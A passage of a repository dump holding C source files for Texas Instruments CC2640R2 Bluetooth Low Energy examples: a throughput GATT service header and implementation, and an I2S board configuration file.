[]\r\n\r\n# Metrics\r\nmse = []\r\nrmse = []\r\nr2 = []\r\nmape = []\r\n\r\n# Iterations\r\niteration = []\r\ncont = 0\r\n\r\ntemp = 1\r\nfor aux in tqdm(range(len_Q, npop, len_Q)):\r\n cont += 1\r\n\r\n # Define Q and N-Q indexes\r\n Q_index = aleatory[0:aux]\r\n N_Q_index = [x for x in index if x not in Q_index]\r\n\r\n # Train\r\n df_Q = create_subsample(df_var=df_var, df_pref=df_pref, nobj=nobj, index=Q_index)\r\n X_train = df_Q.iloc[:, :-nobj] # to predict\r\n y_train = df_Q.iloc[:, -nobj:] # real targets\r\n # Test\r\n df_N_Q = create_subsample(df_var=df_var, df_pref=df_pref, nobj=nobj, index=N_Q_index)\r\n X_test = df_N_Q.iloc[:, :-nobj] # to predict\r\n y_test = df_N_Q.iloc[:, -nobj:] # real targets\r\n\r\n # Model training\r\n if temp > accepted_error:\r\n tuned_model = fine_tunning(CV, X_train, y_train)\r\n with open(\"tuned_model_cbic_5obj.pkl\", 'wb') as arq: # Save best model\r\n pickle.dump(tuned_model, arq)\r\n tuned_model.fit(X_train, y_train)\r\n else:\r\n with open(\"tuned_model_cbic_5obj.pkl\", \"rb\") as fp: # Load trained model\r\n tuned_model = pickle.load(fp)\r\n\r\n # Model evaluation\r\n y_pred = tuned_model.predict(X_test)\r\n y_pred = pd.DataFrame(y_pred)\r\n\r\n # Metrics\r\n mse.append(mean_squared_error(pd.DataFrame(y_test.values), pd.DataFrame(y_pred.values), squared=True))\r\n rmse.append(mean_squared_error(pd.DataFrame(y_test.values), pd.DataFrame(y_pred.values), squared=False))\r\n r2.append(r2_score(pd.DataFrame(y_test.values), pd.DataFrame(y_pred.values)))\r\n mape.append(mean_absolute_percentage_error(pd.DataFrame(y_test.values), pd.DataFrame(y_pred.values)))\r\n\r\n # Merge the predictions of the df train and df test\r\n df_merged = merge_matrices(N_Q_index, df_pref, y_pred)\r\n\r\n # Employ AHP in the predicted (mixed with preferences) dataset\r\n rank_predicted = ahp(df_merged).index\r\n\r\n # Calculate distances\r\n temp = normalised_kendall_tau_distance(r1=rank_aleatory, r2=rank_predicted)\r\n current_previous.append(temp)\r\n current_ahp.append(normalised_kendall_tau_distance(r1=rank_ahp, r2=rank_predicted))\r\n\r\n # df_obj = 
pd.DataFrame(df_obj)\r\n    # plt.scatter(df_obj.loc[:, 0], df_obj.loc[:, 1], color='b')  # available\r\n    # plt.scatter(df_obj.loc[rank_predicted[0:aux], 0], df_obj.loc[rank_predicted[0:aux], 1], color='r',\r\n    #             marker='^')  # top ranked\r\n    # plt.scatter(df_obj.loc[rank_ahp[0:aux], 0], df_obj.loc[rank_ahp[0:aux], 1], color='g', marker='*')  # ahp\r\n    # plt.legend([\"Available\", \"Top ranked\", 'AHP'])\r\n    # plt.show()\r\n\r\n    # Update the ranking\r\n    rank_aleatory = rank_predicted\r\n\r\n    # Store the iteration count\r\n    iteration.append(cont)\r\n\r\n    # if cont == 10:\r\n    #     break\r\n\r\n# Merge the results\r\nresults = pd.DataFrame({'Iteration': iteration,\r\n                        'MSE': mse,\r\n                        'RMSE': rmse,\r\n                        'R2': r2,\r\n                        'MAPE': mape,\r\n                        'Current_Previous': current_previous,\r\n                        'Current_AHP': current_ahp})\r\n\r\nresults_metrics = results[['Iteration', 'MSE', 'RMSE', 'R2', 'MAPE']]\r\nresults_tau = results[['Iteration', 'Current_Previous', 'Current_AHP']]\r\n\r\nfig, ax = plt.subplots()\r\nsns.lineplot(x='Iteration',\r\n             y='value',\r\n             hue='variable',\r\n             data=pd.melt(results_metrics, \"Iteration\"))\r\nax.legend([\"MSE\", \"RMSE\", 'R2', 'MAPE'])\r\nplt.ylabel(\"Error metric\")\r\n# plt.show()\r\nplt.savefig('error_metric_cbic_5obj__.png')\r\nplt.close(fig)  # close the figure window\r\n\r\nfig, ax = plt.subplots()\r\nsns.lineplot(x='Iteration',\r\n             y='value',\r\n             hue='variable',\r\n             data=pd.melt(results_tau, \"Iteration\"))\r\nax.legend([\"Current vs Previous\", 'Current vs AHP'])\r\nax.set_ylim(0, 1)\r\nplt.ylabel(\"Tau similarity\")\r\nplt.axhline(y=.05, ls=':', color='red', marker='*')\r\n# plt.show()\r\nplt.savefig('similarity_cbic_5obj__.png')\r\nplt.close(fig)  # close the figure window\r\n\r\n# Select top10 to plot\r\ntop10_pred = rank_predicted[0:10]\r\nselect_top10 = pd.DataFrame(df_obj)\r\nselect_top10 = select_top10.iloc[top10_pred, :]\r\nselect_top10 = select_top10.round(4)  # assign the result (round() is not in-place)\r\nselect_top10.to_csv(\"selected_top10_cbic_5obj_.csv\")\r\n"
},
{
"alpha_fraction": 0.5738396644592285,
"alphanum_fraction": 0.5822784900665283,
"avg_line_length": 21.899999618530273,
"blob_id": "04266f7a14c8ab72129152fc1fe147116aa6dde9",
"content_id": "a2ba02a8230848c0c7711aec40a500e0258b01cd",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 237,
"license_type": "permissive",
"max_line_length": 97,
"num_lines": 10,
"path": "/ahp.py",
"repo_name": "mvoicer/cbic-2021-learning-preferences",
"src_encoding": "UTF-8",
"text": "import pandas as pd\r\n\r\n\r\ndef ahp(df):\r\n \"\"\"\r\n Define the AHP method\r\n :param df: preference matrix\r\n :return: ranking\r\n \"\"\"\r\n return ((df / df.apply('sum', axis = 0)).apply(\"sum\", axis = 1)).sort_values(ascending=False)"
},
{
"alpha_fraction": 0.5990663766860962,
"alphanum_fraction": 0.6058091521263123,
"avg_line_length": 33.703704833984375,
"blob_id": "fabc4caa5cec23f9f4b296bba9c207537502c90f",
"content_id": "f77c699c0cad28049b25cea8de2b4a3880e31a0a",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1930,
"license_type": "permissive",
"max_line_length": 122,
"num_lines": 54,
"path": "/data_preparation.py",
"repo_name": "mvoicer/cbic-2021-learning-preferences",
"src_encoding": "UTF-8",
"text": "import pandas as pd\r\nimport numpy as np\r\n\r\n\r\ndef create_subsample(df_var, df_pref, nobj, index):\r\n \"\"\"\r\n Create sub-dataframes with the features (alternatives) and target (value in the objective space).\r\n :param df_var:\r\n :param df_pref:\r\n :param nobj:\r\n :param index:\r\n :return:\r\n \"\"\"\r\n\r\n # Create a df_aux that receive the features concatenated (objectives) and targets (preference)\r\n sub_df = pd.DataFrame(np.zeros((len(index), df_var.shape[1]*2 + nobj)))\r\n cont = 0\r\n for i in index:\r\n for j in index:\r\n # Concatenate the two rows - i.e. values of the objectives\r\n # and the preference between the two objectives\r\n sub_df.loc[cont] = pd.concat([df_var.loc[i], df_var.loc[j], df_pref.loc[i, j]], axis = 0, ignore_index = True)\r\n cont += 1\r\n return sub_df\r\n\r\ndef merge_matrices(idx_N_Q, preference_matrix, ml_predicted):\r\n \"\"\"\r\n Replace the predicted values in the preference matrix to calculate\r\n if the rankings (predicted vs preference) are equal or not.\r\n :param idx_N_Q: N-Q index\r\n :param preference_matrix: preference matrix\r\n :param ml_predicted: ranking obtained with the ML method\r\n :return: dataframe merged with the real values and the predicted values\r\n \"\"\"\r\n df_merged = preference_matrix.copy()\r\n nobj = ml_predicted.shape[1]\r\n\r\n # Gera todas as combinações do N-Q\r\n comb_idx = []\r\n for i in idx_N_Q:\r\n for k in idx_N_Q:\r\n comb_idx.append(tuple([i, k]))\r\n\r\n results = pd.DataFrame()\r\n x = 0\r\n for _ in range(0, df_merged.shape[1], df_merged.shape[0]):\r\n m = df_merged.iloc[:, nobj:nobj+df_merged.shape[0]].to_numpy()\r\n\r\n for i, idx in enumerate(comb_idx):\r\n m[idx] = ml_predicted.values[i, x]\r\n x += 1\r\n m = pd.DataFrame(m)\r\n results = pd.concat([results, m], ignore_index=False, axis=1)\r\n return results\r\n"
},
{
"alpha_fraction": 0.2960091829299927,
"alphanum_fraction": 0.31323572993278503,
"avg_line_length": 57.06779479980469,
"blob_id": "e5a190dd4a67c687689f3ba12b31f7379999f791",
"content_id": "761be66b364a67808d5bfb58d0a9be7cb1228f7a",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3483,
"license_type": "permissive",
"max_line_length": 89,
"num_lines": 59,
"path": "/fine_tunning.py",
"repo_name": "mvoicer/cbic-2021-learning-preferences",
"src_encoding": "UTF-8",
"text": "from sklearn.multioutput import MultiOutputRegressor\r\nfrom sklearn.model_selection import RandomizedSearchCV\r\nfrom sklearn.ensemble import GradientBoostingRegressor\r\n\r\ndef fine_tunning(CV, X, y):\r\n \"\"\"\r\n Search the best parameters for the Gradient Boosting Regressor model.\r\n \"\"\"\r\n model = MultiOutputRegressor(GradientBoostingRegressor(loss='ls',\r\n learning_rate=0.001,\r\n n_estimators=500,\r\n subsample=1.0,\r\n criterion='friedman_mse',\r\n min_samples_split=10,\r\n min_samples_leaf=1,\r\n min_weight_fraction_leaf=0.0,\r\n max_depth=30,\r\n min_impurity_decrease=0.0,\r\n min_impurity_split=None,\r\n init=None,\r\n random_state= 42,\r\n max_features=None,\r\n alpha=0.9,\r\n verbose=0,\r\n max_leaf_nodes=None,\r\n warm_start=False,\r\n validation_fraction=0.1,\r\n n_iter_no_change=None,\r\n tol=0.0001,\r\n ccp_alpha=0.0))\r\n\r\n hyperparameters = dict(estimator__learning_rate=[0.05],\r\n estimator__loss=['ls'],\r\n estimator__n_estimators=[500, 1000],\r\n estimator__criterion=['friedman_mse'],\r\n estimator__min_samples_split=[7, 10],\r\n estimator__max_depth=[15, 30],\r\n estimator__min_samples_leaf=[1, 2],\r\n estimator__min_impurity_decrease=[0],\r\n estimator__max_leaf_nodes=[5, 30])\r\n\r\n randomized_search = RandomizedSearchCV(model,\r\n hyperparameters,\r\n random_state=42,\r\n n_iter=5,\r\n scoring=None,\r\n n_jobs=-1,\r\n refit=True,\r\n cv=CV,\r\n verbose=True,\r\n pre_dispatch='2*n_jobs',\r\n error_score='raise',\r\n return_train_score=True)\r\n\r\n hyperparameters_tuning = randomized_search.fit(X, y)\r\n\r\n tuned_model = hyperparameters_tuning.best_estimator_\r\n\r\n return tuned_model"
},
{
"alpha_fraction": 0.5822649598121643,
"alphanum_fraction": 0.6047008633613586,
"avg_line_length": 29.200000762939453,
"blob_id": "b3ce8d70631d4890141228151f78ee73ac8661dd",
"content_id": "0556de65d2e4fc4039eed11646c130ae97429a90",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 936,
"license_type": "permissive",
"max_line_length": 121,
"num_lines": 30,
"path": "/tau_distance.py",
"repo_name": "mvoicer/cbic-2021-learning-preferences",
"src_encoding": "UTF-8",
"text": "import scipy.stats as stats\r\nimport numpy as np\r\n\r\n\r\ndef tau_distance(r1, r2):\r\n \"\"\"\r\n Tau distance\r\n Values close to 1 indicate strong agreement,\r\n and values close to -1 indicate strong disagreement.\r\n :param r1: list1\r\n :param r2: list2\r\n :return: tau distance between two lists\r\n \"\"\"\r\n tau, p_value = stats.kendalltau(r1, r2)\r\n return tau\r\n\r\ndef normalised_kendall_tau_distance(r1, r2):\r\n \"\"\"\r\n Compute the normalized Kendall tau distance.\r\n :param r1: list1\r\n :param r2: list2\r\n :return: normalized tau distance between two lists\r\n \"\"\"\r\n n = len(r1)\r\n assert len(r2) == n, \"Both lists have to be of equal length\"\r\n i, j = np.meshgrid(np.arange(n), np.arange(n))\r\n a = np.argsort(r1)\r\n b = np.argsort(r2)\r\n ndisordered = np.logical_or(np.logical_and(a[i] < a[j], b[i] > b[j]), np.logical_and(a[i] > a[j], b[i] < b[j])).sum()\r\n return ndisordered / (n * (n - 1))\r\n"
},
{
"alpha_fraction": 0.7564841508865356,
"alphanum_fraction": 0.7853025794029236,
"avg_line_length": 121.29412078857422,
"blob_id": "84d7f0501aa1c7db29b44971c5d4718dc75fb12f",
"content_id": "7b2d9848c1ce35b052b4ab97e53cae971bb297bf",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 2082,
"license_type": "permissive",
"max_line_length": 1398,
"num_lines": 17,
"path": "/README.md",
"repo_name": "mvoicer/cbic-2021-learning-preferences",
"src_encoding": "UTF-8",
"text": "# cbic-2021-learning-preferences\nPaper published in CBIC2021 entitled \"Learning Pairwise Comparisons with Machine Learning for Large-Scale Multi-Criteria Decision Making Problems\"\nDOI: 10.21528/CBIC2021-13\n\nAbstract: Decision making is a complex task and requires a lot of cognitive effort from the decision maker. Multi-criteria methods, especially those based on pairwise comparisons, such as the Analytic Hierarchic Process (AHP), are not viable for large-scale decision-making problems. For this reason, the aim of this paper is to learn the preferences of the decision-maker using machine learning techniques in order to reduce the number of queries that are necessary in decision problems. We used a recently published parameterized generator of scalable and customizable benchmark problems for many-objective problems as a large-scale data generator. The proposed methodology is an iterative method in which a small subset of solutions are presented to the decision-maker to obtain pairwise judgments. This information is fed to an algorithm that learns the preferences for the remaining pairs in the decision matrix. The Gradient Boosting Regressor was applied in a problem with 5 criteria and 210 solutions. Subsets of 5, 7 and 10 solutions were used in each iteration. The metrics MSE, RMSE, MAPE and R2 were calculated. After the 8th iteration the ranking similarity stabilized, as measured by the tau distance. As the main advantage of the proposed approach is that it was necessary only 8 iterations presenting 5 solutions per time to learn the preferences and get an accurate final ranking. \n\n@INPROCEEDINGS{CBIC2021-13,\n TITLE=\t\t{Marcos Antonio Alves, Ivan Reinaldo Meneghini and Frederico Gadelha Guimaraes.},\n AUTHOR=\t\t{Learning Pairwise Comparisons with Machine Learning for Large-Scale Multi-Criteria Decision Making Problems},\n PAGES=\t\t{1-7},\n BOOKTITLE=\t{Anais do 15 Congresso Brasileiro de Inteligencia Computacional},\n EDITOR=\t\t{Carmelo Jose Albanez Bastos Filho and Hugo Valadares Siqueira and Danton Diego Ferreira and Douglas Wildgrube Bertol and Roberto Celio Limao de Oliveira},\n PUBLISHER=\t{SBIC},\n ADDRESS=\t{Joinville, SC},\n YEAR=\t\t{2021},\n DOI= {10.21528/CBIC2021-13}\n }\n \n"
}
] | 7 |
rlatrifork/ble_examples_test | https://github.com/rlatrifork/ble_examples_test | dbf9c60a75698322603e43ae50b6a81b87d3f7cf | 227a8139a48d5780aacdd8173e2b582a90431a07 | 35e63ec2c7d7b4920f068df7ac3feb969c6854ae | refs/heads/master | 2021-05-15T19:13:50.533326 | 2017-10-20T13:42:03 | 2017-10-20T13:42:03 | 107,681,309 | 1 | 2 | null | null | null | null | null | [
{
"alpha_fraction": 0.6035353541374207,
"alphanum_fraction": 0.6124708652496338,
"avg_line_length": 33.55033493041992,
"blob_id": "adf5515f114ffc5b362d339070f24f55489a67f7",
"content_id": "38fbd63d1c64b9ca7a63cfcd7ab90d96d15e5880",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C",
"length_bytes": 5148,
"license_type": "no_license",
"max_line_length": 99,
"num_lines": 149,
"path": "/source/ti/ble5stack/profiles/throughput/throughput_service.h",
"repo_name": "rlatrifork/ble_examples_test",
"src_encoding": "UTF-8",
"text": "/**********************************************************************************************\n * Filename: Throughput_Service.h\n *\n * Description: This file contains the Throughput_Service service definitions and\n * prototypes.\n *\n * Copyright (c) 2015-2017, Texas Instruments Incorporated\n * All rights reserved.\n *\n * Redistribution and use in source and binary forms, with or without\n * modification, are permitted provided that the following conditions\n * are met:\n *\n * * Redistributions of source code must retain the above copyright\n * notice, this list of conditions and the following disclaimer.\n *\n * * Redistributions in binary form must reproduce the above copyright\n * notice, this list of conditions and the following disclaimer in the\n * documentation and/or other materials provided with the distribution.\n *\n * * Neither the name of Texas Instruments Incorporated nor the names of\n * its contributors may be used to endorse or promote products derived\n * from this software without specific prior written permission.\n *\n * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\"\n * AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n * THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n * PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR\n * CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,\n * EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,\n * PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS;\n * OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n * WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR\n * OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE,\n * EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n *\n *************************************************************************************************/\n\n\n#ifndef _THROUGHPUT_SERVICE_H_\n#define _THROUGHPUT_SERVICE_H_\n\n#ifdef __cplusplus\nextern \"C\"\n{\n#endif\n\n/*********************************************************************\n * INCLUDES\n */\n\n/*********************************************************************\n * CONSTANTS\n */\n\n/*********************************************************************\n* CONSTANTS\n*/\n// Service UUID\n#define THROUGHPUT_SERVICE_SERV_UUID 0x1234\n\n// Characteristic defines\n#define THROUGHPUT_SERVICE_UPDATE_PDU 0\n#define THROUGHPUT_SERVICE_UPDATE_PDU_UUID 0x1235\n#define THROUGHPUT_SERVICE_UPDATE_PDU_LEN 1\n\n// Characteristic defines\n#define THROUGHPUT_SERVICE_UPDATE_PHY 1\n#define THROUGHPUT_SERVICE_UPDATE_PHY_UUID 0x1236\n#define THROUGHPUT_SERVICE_UPDATE_PHY_LEN 1\n\n// Characteristic defines\n#define THROUGHPUT_SERVICE_TOGGLE_THROUGHPUT 2\n#define THROUGHPUT_SERVICE_TOGGLE_THROUGHPUT_UUID 0x1237\n#define THROUGHPUT_SERVICE_TOGGLE_THROUGHPUT_LEN 1\n\n/*********************************************************************\n * TYPEDEFS\n */\n\n/*********************************************************************\n * MACROS\n */\n\n/*********************************************************************\n * Profile Callbacks\n */\n\n// Callback when a characteristic value has changed\ntypedef void (*Throughput_ServiceChange_t)( uint8 paramID );\n\ntypedef struct\n{\n Throughput_ServiceChange_t pfnChangeCb; // Called when characteristic value changes\n} 
Throughput_ServiceCBs_t;\n\n\n\n/*********************************************************************\n * API FUNCTIONS\n */\n\n\n/*\n * Throughput_Service_AddService - Initializes the Throughput_Service service by registering\n * GATT attributes with the GATT server.\n *\n */\nextern bStatus_t Throughput_Service_AddService( void );\n\n/*\n * Throughput_Service_RegisterAppCBs - Registers the application callback function.\n * Only call this function once.\n *\n * appCallbacks - pointer to application callbacks.\n */\nextern bStatus_t Throughput_Service_RegisterAppCBs( Throughput_ServiceCBs_t *appCallbacks );\n\n/*\n * Throughput_Service_SetParameter - Set a Throughput_Service parameter.\n *\n * param - Profile parameter ID\n * len - length of data to write\n * value - pointer to data to write. This is dependent on\n * the parameter ID and WILL be cast to the appropriate\n * data type (example: data type of uint16 will be cast to\n * uint16 pointer).\n */\nextern bStatus_t Throughput_Service_SetParameter( uint8 param, uint8 len, void *value );\n\n/*\n * Throughput_Service_GetParameter - Get a Throughput_Service parameter.\n *\n * param - Profile parameter ID\n * value - pointer to data to write. This is dependent on\n * the parameter ID and WILL be cast to the appropriate\n * data type (example: data type of uint16 will be cast to\n * uint16 pointer).\n */\nextern bStatus_t Throughput_Service_GetParameter( uint8 param, void *value );\n\n/*********************************************************************\n*********************************************************************/\n\n#ifdef __cplusplus\n}\n#endif\n\n#endif /* _THROUGHPUT_SERVICE_H_ */\n"
},
{
"alpha_fraction": 0.6518004536628723,
"alphanum_fraction": 0.6878097057342529,
"avg_line_length": 38.31168746948242,
"blob_id": "995f00e32f499a37e2285f59d23fd6ba8bc60f8e",
"content_id": "c1b7ec51309d28584c8e41684a1b50fe20e7f186",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C",
"length_bytes": 3027,
"license_type": "no_license",
"max_line_length": 80,
"num_lines": 77,
"path": "/source/ti/boards/CC2640R2_LAUNCHXL_I2S/CC2640R2_LAUNCHXL_I2S.c",
"repo_name": "rlatrifork/ble_examples_test",
"src_encoding": "UTF-8",
"text": "/*\n * Copyright (c) 2016, Texas Instruments Incorporated\n * All rights reserved.\n *\n * Redistribution and use in source and binary forms, with or without\n * modification, are permitted provided that the following conditions\n * are met:\n *\n * * Redistributions of source code must retain the above copyright\n * notice, this list of conditions and the following disclaimer.\n *\n * * Redistributions in binary form must reproduce the above copyright\n * notice, this list of conditions and the following disclaimer in the\n * documentation and/or other materials provided with the distribution.\n *\n * * Neither the name of Texas Instruments Incorporated nor the names of\n * its contributors may be used to endorse or promote products derived\n * from this software without specific prior written permission.\n *\n * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\"\n * AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n * THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n * PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR\n * CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,\n * EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,\n * PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS;\n * OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n * WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR\n * OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE,\n * EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n */\n\n/*\n * ====================== CC2640R2_LAUNCHXL_I2S.c ===========================\n * This board file is an addendum to CC2640R2_LAUNCHXL.c. It adds an I2S\n * object to interface the CC2640R2F and a booster pack.\n * ============================================================================\n */\n\n#include <xdc/std.h>\n#include <xdc/runtime/System.h>\n#include <ti/sysbios/family/arm/m3/Hwi.h>\n\n#include \"CC2640R2_LAUNCHXL_I2S.h\"\n/*\n *============================= I2S begin =====================================\n */\n/* Place into subsections to allow the TI linker to remove items properly */\n#if defined(__TI_COMPILER_VERSION__)\n#pragma DATA_SECTION(I2SCC26XX_config, \".const:I2SCC26XX_config\")\n#pragma DATA_SECTION(i2sCC26XXHWAttrs, \".const:i2sCC26XXHWAttrs\")\n#endif\n\n#include <ti/drivers/i2s/I2SCC26XX.h>\n\nI2SCC26XX_Object i2sCC26XXObject;\n\nconst I2SCC26XX_HWAttrs i2sCC26XXHWAttrs = {\n .baseAddr = I2S0_BASE,\n .intNum = INT_I2S_IRQ,\n .intPriority = ~0,\n .powerMngrId = PowerCC26XX_PERIPH_I2S,\n .mclkPin = CC2640R2_LAUNCHXL_I2S_MCLK,\n .bclkPin = CC2640R2_LAUNCHXL_I2S_BCLK,\n .wclkPin = CC2640R2_LAUNCHXL_I2S_WCLK,\n .ad0Pin = CC2640R2_LAUNCHXL_I2S_ADO,\n .ad1Pin = CC2640R2_LAUNCHXL_I2S_ADI,\n};\n\n/* I2S configuration structure */\nconst I2SCC26XX_Config I2SCC26XX_config[] = {\n {\n .object = &i2sCC26XXObject,\n .hwAttrs = &i2sCC26XXHWAttrs\n },\n {NULL, NULL}\n};\n"
},
{
"alpha_fraction": 0.6159595251083374,
"alphanum_fraction": 0.6215646266937256,
"avg_line_length": 32.38430404663086,
"blob_id": "06dad6134b3f6be635ca69b99a8032cc8b7c967f",
"content_id": "33ea8a5f8885ee4381c2669ed18adc06634e5ae8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C",
"length_bytes": 16592,
"license_type": "no_license",
"max_line_length": 110,
"num_lines": 497,
"path": "/source/ti/ble5stack/profiles/throughput/throughput_service.c",
"repo_name": "rlatrifork/ble_examples_test",
"src_encoding": "UTF-8",
"text": "/**********************************************************************************************\n * Filename: Throughput_Service.c\n *\n * Description: This file contains the implementation of the service.\n *\n * Copyright (c) 2015-2017, Texas Instruments Incorporated\n * All rights reserved.\n *\n * Redistribution and use in source and binary forms, with or without\n * modification, are permitted provided that the following conditions\n * are met:\n *\n * * Redistributions of source code must retain the above copyright\n * notice, this list of conditions and the following disclaimer.\n *\n * * Redistributions in binary form must reproduce the above copyright\n * notice, this list of conditions and the following disclaimer in the\n * documentation and/or other materials provided with the distribution.\n *\n * * Neither the name of Texas Instruments Incorporated nor the names of\n * its contributors may be used to endorse or promote products derived\n * from this software without specific prior written permission.\n *\n * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\"\n * AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n * THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n * PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR\n * CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,\n * EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,\n * PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS;\n * OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n * WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR\n * OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE,\n * EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n *\n *************************************************************************************************/\n\n\n/*********************************************************************\n * INCLUDES\n */\n#include <string.h>\n\n#include \"bcomdef.h\"\n#include \"OSAL.h\"\n#include \"linkdb.h\"\n#include \"att.h\"\n#include \"gatt.h\"\n#include \"gatt_uuid.h\"\n#include \"gattservapp.h\"\n#include \"gapbondmgr.h\"\n\n#include \"Throughput_Service.h\"\n\n/*********************************************************************\n * MACROS\n */\n\n/*********************************************************************\n * CONSTANTS\n */\n\n/*********************************************************************\n * TYPEDEFS\n */\n\n/*********************************************************************\n* GLOBAL VARIABLES\n*/\n\n// Throughput_Service Service UUID\nCONST uint8_t Throughput_ServiceUUID[ATT_UUID_SIZE] =\n{\n TI_BASE_UUID_128(THROUGHPUT_SERVICE_SERV_UUID)\n};\n\n// Update_PDU UUID\nCONST uint8_t Throughput_Service_Update_PDUUUID[ATT_UUID_SIZE] =\n{\n TI_BASE_UUID_128(THROUGHPUT_SERVICE_UPDATE_PDU_UUID)\n};\n// Update_PHY UUID\nCONST uint8_t Throughput_Service_Update_PHYUUID[ATT_UUID_SIZE] =\n{\n TI_BASE_UUID_128(THROUGHPUT_SERVICE_UPDATE_PHY_UUID)\n};\n// Toggle_Throughput UUID\nCONST uint8_t Throughput_Service_Toggle_ThroughputUUID[ATT_UUID_SIZE] =\n{\n TI_BASE_UUID_128(THROUGHPUT_SERVICE_TOGGLE_THROUGHPUT_UUID)\n};\n\n/*********************************************************************\n * LOCAL VARIABLES\n */\n\nstatic Throughput_ServiceCBs_t *pAppCBs = NULL;\n\n/*********************************************************************\n* Profile Attributes - variables\n*/\n\n// 
Service declaration\nstatic CONST gattAttrType_t Throughput_ServiceDecl = { ATT_UUID_SIZE, Throughput_ServiceUUID };\n\n// Characteristic \"Update_PDU\" Properties (for declaration)\nstatic uint8_t Throughput_Service_Update_PDUProps = GATT_PROP_READ | GATT_PROP_WRITE;\n\n// Characteristic \"Update_PDU\" Value variable\nstatic uint8_t Throughput_Service_Update_PDUVal[THROUGHPUT_SERVICE_UPDATE_PDU_LEN] = {0};\n// Characteristic \"Update_PHY\" Properties (for declaration)\nstatic uint8_t Throughput_Service_Update_PHYProps = GATT_PROP_READ | GATT_PROP_WRITE;\n\n// Characteristic \"Update_PHY\" Value variable\nstatic uint8_t Throughput_Service_Update_PHYVal[THROUGHPUT_SERVICE_UPDATE_PHY_LEN] = {0};\n// Characteristic \"Toggle_Throughput\" Properties (for declaration)\nstatic uint8_t Throughput_Service_Toggle_ThroughputProps = GATT_PROP_READ | GATT_PROP_WRITE;\n\n// Characteristic \"Toggle_Throughput\" Value variable\nstatic uint8_t Throughput_Service_Toggle_ThroughputVal[THROUGHPUT_SERVICE_TOGGLE_THROUGHPUT_LEN] = {0};\n\n/*********************************************************************\n* Profile Attributes - Table\n*/\n\nstatic gattAttribute_t Throughput_ServiceAttrTbl[] =\n{\n // Throughput_Service Service Declaration\n {\n { ATT_BT_UUID_SIZE, primaryServiceUUID },\n GATT_PERMIT_READ,\n 0,\n (uint8_t *)&Throughput_ServiceDecl\n },\n // Update_PDU Characteristic Declaration\n {\n { ATT_BT_UUID_SIZE, characterUUID },\n GATT_PERMIT_READ,\n 0,\n &Throughput_Service_Update_PDUProps\n },\n // Update_PDU Characteristic Value\n {\n { ATT_UUID_SIZE, Throughput_Service_Update_PDUUUID },\n GATT_PERMIT_READ | GATT_PERMIT_WRITE,\n 0,\n Throughput_Service_Update_PDUVal\n },\n // Update_PHY Characteristic Declaration\n {\n { ATT_BT_UUID_SIZE, characterUUID },\n GATT_PERMIT_READ,\n 0,\n &Throughput_Service_Update_PHYProps\n },\n // Update_PHY Characteristic Value\n {\n { ATT_UUID_SIZE, Throughput_Service_Update_PHYUUID },\n GATT_PERMIT_READ | GATT_PERMIT_WRITE,\n 0,\n Throughput_Service_Update_PHYVal\n },\n // Toggle_Throughput 